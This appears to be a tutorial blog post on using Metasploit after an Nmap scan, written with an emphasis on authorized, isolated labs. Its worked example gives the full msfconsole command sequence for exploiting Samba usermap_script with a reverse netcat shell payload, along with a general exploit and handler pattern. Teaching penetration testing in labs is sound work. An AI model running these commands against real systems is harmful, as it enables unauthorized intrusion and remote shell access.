Preamble
Metasploit bundles auxiliary modules, exploits, payloads, and post tooling. It is powerful enough that “I was learning” is not a legal defense on someone else’s network. I use it only in isolated VMs with snapshots, on ranges I own or have explicit written authorization to test—same ethics frame as sqlmap and Nmap.
Workflow after Nmap
- Import or hand-enter Nmap findings (services, versions).
- Start with auxiliary scanners that verify behavior without exploiting.
- Move to exploits only when the lab is designed for that outcome and the legal box is checked.
Document each module, options, and outcome like a lab notebook—future you writes reports; present you stays honest.
Worked example: Samba usermap and a reverse shell
The following is a textbook lab pattern only: a deliberately vulnerable image such as Metasploitable 2 (or another range you own) with SMB ports open, paired with an attacker VM on the same isolated network. Module paths and payloads can differ slightly by Metasploit release; use search and info when in doubt.
1. Confirm the service (after your Nmap pass). You are looking for Samba/smbd on something like TCP 139 and 445, with a version string that matches known lab images—not proof of exploitability by itself, but it tells you which search terms to try.
2. Start the console.
$ msfconsole -q
3. Find and select the exploit.
msf6 > search type:exploit samba usermap
msf6 > use exploit/multi/samba/usermap_script
4. Point the exploit at the target and choose a reverse payload. A reverse shell has the target connect out to your machine, which is often easier in NAT’d lab topologies than a bind shell. Set LHOST to an address the target can route to (your attacker VM’s interface on the lab LAN, not 127.0.0.1).
msf6 exploit(...)> show options
msf6 exploit(...)> set RHOSTS 192.168.56.101
msf6 exploit(...)> set LHOST 192.168.56.1
msf6 exploit(...)> set LPORT 4444
msf6 exploit(...)> set payload cmd/unix/reverse_netcat
msf6 exploit(...)> exploit
5. Read the result. Success is usually an interactive shell (or a session you can interact with via Metasploit’s job/session commands, depending on version). If the handler never receives a connection, typical lab fixes are: wrong LHOST, host firewall on the attacker, or the target not actually vulnerable to this module (wrong box or patched image).
6. Lab hygiene. When you are done, revert the snapshot or reprovision the victim VM. Treat any credential or data touched in the lab as throwaway.
Pattern for other exploits: use a module → show options / show payloads → set RHOSTS (and service-specific options) → set payload, LHOST, LPORT for reverse shells → exploit or run. For staged payloads or hand-generated binaries, you often pair a listener with use exploit/multi/handler and the same payload settings—same LHOST/LPORT, then deliver the artifact through your authorized test path.
Engineering parallel: isolation discipline
Destructive integration tests and exploit labs share one virtue: environment isolation. Snapshots, disposable networks, and seeded data prevent “oops” from becoming career events. That mindset transfers directly to CI hygiene for database migrations and chaos experiments.
Conclusion
Metasploit teaches system interactions attackers automate. Defenders learn patch velocity, least privilege, and segmentation. A First Go CLI: Tooling and Modules switches tone to Go CLIs for everyday ops utilities.